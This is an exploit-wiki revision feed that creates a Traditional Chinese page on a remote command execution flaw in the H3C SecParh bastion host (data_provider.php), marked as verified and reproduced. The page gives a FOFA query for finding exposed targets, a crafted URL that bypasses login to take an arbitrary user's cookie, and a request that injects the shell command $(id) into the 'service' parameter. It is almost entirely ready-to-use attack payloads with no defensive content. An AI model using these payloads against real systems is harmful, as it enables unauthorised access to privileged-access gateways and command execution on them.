https://pwnwiki.com/index.php?action=history&feed=atom&title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-tw
H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞/zh-tw - Revision history
2026-04-13T18:17:51Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&diff=5825&oldid=prev
Pwnwiki: Created page with "H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞"
2021-06-24T02:19:34Z
<p>Created page with "H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞"</p>
<p><b>New page</b></p><div><languages /><br />
{| style="margin: auto; width: 750px;color:green;"<br />
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |<br />
{| cellspacing="2px" <br />
| valign="middle" | [[Image:Check.png|50px]]<br />
| <strong>該漏洞已通過驗證。</strong><br />
|<br />
| <center>本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。</center><br />
|}<br />
|}<br />
<br><noinclude><br />
<br />
==漏洞影響==<br />
H3C SecParh fortress machine<br />
<br />
==FOFA==<br />
<pre><br />
app="H3C-SecPath-运维审计系统" <br />
</pre><br />
<br />
==漏洞利用==<br />
通過任意用戶登錄獲取Cookie:<br />
<pre><br />
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin<br />
</pre><br />
<br />
<pre><br />
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true<br />
</pre><br />
<br />
==參考==<br />
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw</div>
Pwnwiki